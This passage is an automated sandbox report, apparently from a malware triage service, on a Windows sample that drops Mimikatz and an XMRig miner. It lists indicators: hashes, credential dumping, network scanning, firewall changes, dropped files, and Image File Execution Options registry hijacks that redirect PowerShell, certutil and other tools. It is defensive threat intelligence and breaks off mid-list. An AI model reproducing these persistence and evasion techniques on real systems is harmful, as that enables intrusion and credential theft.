Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2025 01:23
Behavioral task
behavioral1
Sample
2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe
-
Size
7.2MB
-
MD5
e3ea36422f9edef05e95cd4944c88842
-
SHA1
90d2ec61722ac3abaf6cd4b90df52c3bd163cbfe
-
SHA256
8f27a851626cff1504d6f8cecf9a2acdbe4685505b5cd0759b374d055ea52b50
-
SHA512
469c1aec4914b180e4a042ed5b159a4c29df4642287e2d2f45337f0e03578d05c4ccee43c61d3de73dad4dff0fcf63e68973561f2d8e6edc92a1b672e1699d29
-
SSDEEP
196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1984 created 1012 1984 cmlkkib.exe 37 -
Xmrig family
-
Contacts a large (28240) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/548-175-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-180-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-197-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-210-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-219-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-231-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-236-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-257-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-497-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-499-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-739-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig behavioral2/memory/548-740-0x00007FF623700000-0x00007FF623820000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
resource yara_rule behavioral2/memory/2556-3-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023be2-5.dat mimikatz behavioral2/memory/4140-135-0x00007FF6C0F10000-0x00007FF6C0FFE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmlkkib.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts cmlkkib.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe cmlkkib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" cmlkkib.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 5044 netsh.exe 3684 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 452 cmlkkib.exe 1984 cmlkkib.exe 3092 wpcap.exe 4976 cbftscrnu.exe 4140 vfshost.exe 3704 unnsehtzr.exe 2188 xohudmc.exe 3496 cusoqc.exe 548 gktgmq.exe 4344 unnsehtzr.exe 4048 unnsehtzr.exe 1540 unnsehtzr.exe 532 unnsehtzr.exe 1388 unnsehtzr.exe 1680 unnsehtzr.exe 2124 unnsehtzr.exe 4716 unnsehtzr.exe 3048 unnsehtzr.exe 3860 unnsehtzr.exe 2256 unnsehtzr.exe 1512 unnsehtzr.exe 748 unnsehtzr.exe 4048 cmlkkib.exe 2364 unnsehtzr.exe 4228 unnsehtzr.exe 3684 unnsehtzr.exe 1260 unnsehtzr.exe 512 tgkfgfrve.exe 5988 cmlkkib.exe -
Loads dropped DLL 12 IoCs
pid Process 3092 wpcap.exe 3092 wpcap.exe 3092 wpcap.exe 3092 wpcap.exe 3092 wpcap.exe 3092 wpcap.exe 3092 wpcap.exe 3092 wpcap.exe 3092 wpcap.exe 4976 cbftscrnu.exe 4976 cbftscrnu.exe 4976 cbftscrnu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData cmlkkib.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\cusoqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F cmlkkib.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache cmlkkib.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F cmlkkib.exe File opened for modification C:\Windows\SysWOW64\cusoqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 cmlkkib.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 cmlkkib.exe -
resource yara_rule behavioral2/files/0x0007000000023c81-131.dat upx behavioral2/memory/4140-133-0x00007FF6C0F10000-0x00007FF6C0FFE000-memory.dmp upx behavioral2/memory/4140-135-0x00007FF6C0F10000-0x00007FF6C0FFE000-memory.dmp upx behavioral2/files/0x0007000000023c8c-138.dat upx behavioral2/memory/3704-139-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/3704-147-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-162-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/files/0x0007000000023c89-161.dat upx behavioral2/memory/4344-168-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/4048-172-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-175-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/1540-178-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-180-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/532-183-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/1388-187-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/1680-191-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/2124-195-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-197-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/4716-200-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/3048-204-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/3860-208-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-210-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/2256-213-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/1512-217-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-219-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/748-222-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/2364-228-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/4228-230-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-231-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/3684-233-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/1260-235-0x00007FF70A3E0000-0x00007FF70A43B000-memory.dmp upx behavioral2/memory/548-236-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/548-257-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/548-497-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/548-499-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/548-739-0x00007FF623700000-0x00007FF623820000-memory.dmp upx behavioral2/memory/548-740-0x00007FF623700000-0x00007FF623820000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\mnvzbkud\cmlkkib.exe 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\Packet.dll cmlkkib.exe File created C:\Windows\ime\cmlkkib.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\Corporate\mimilib.dll cmlkkib.exe File created C:\Windows\mnvzbkud\cmlkkib.exe 2025-01-12_e3ea36422f9edef05e95cd4944c88842_hacktools_icedid_mimikatz.exe File created C:\Windows\vsjtbfmcn\UnattendGC\spoolsrv.xml cmlkkib.exe File created C:\Windows\mnvzbkud\spoolsrv.xml cmlkkib.exe File created C:\Windows\mnvzbkud\docmicfg.xml cmlkkib.exe File created C:\Windows\mnvzbkud\svschost.xml cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\spoolsrv.xml cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\schoedcl.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\coli-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\AppCapture32.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\schoedcl.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\svschost.xml cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\svschost.xml cmlkkib.exe File opened for modification C:\Windows\vsjtbfmcn\Corporate\log.txt cmd.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\xdvl-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\docmicfg.exe cmlkkib.exe File created C:\Windows\mnvzbkud\vimpcsvc.xml cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\docmicfg.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\cbftscrnu.exe cmlkkib.exe File opened for modification C:\Windows\vsjtbfmcn\nifklhuyf\Packet.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\trch-1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\tucl-1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\tibe-2.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\vimpcsvc.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\cnli-1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\ssleay32.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\vimpcsvc.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\scan.bat cmlkkib.exe File opened for modification C:\Windows\vsjtbfmcn\nifklhuyf\Result.txt tgkfgfrve.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\docmicfg.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\Shellcode.ini cmlkkib.exe File created C:\Windows\vsjtbfmcn\Corporate\mimidrv.sys cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\schoedcl.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\AppCapture64.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\libxml2.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\posh-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\zlib1.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\svschost.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\wpcap.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\exma-1.dll cmlkkib.exe File opened for modification C:\Windows\mnvzbkud\vimpcsvc.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\tgkfgfrve.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\crli-0.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\ucl.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\schoedcl.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\spoolsrv.exe cmlkkib.exe File created C:\Windows\vsjtbfmcn\upbdrjv\swrpwe.exe cmlkkib.exe File created C:\Windows\mnvzbkud\schoedcl.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\nifklhuyf\ip.txt cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\libeay32.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\svschost.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\docmicfg.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\vimpcsvc.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\trfo-2.dll cmlkkib.exe File created C:\Windows\vsjtbfmcn\UnattendGC\specials\spoolsrv.xml cmlkkib.exe File created C:\Windows\vsjtbfmcn\Corporate\vfshost.exe cmlkkib.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1736 sc.exe 4852 sc.exe 348 sc.exe 3420 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmlkkib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cusoqc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key 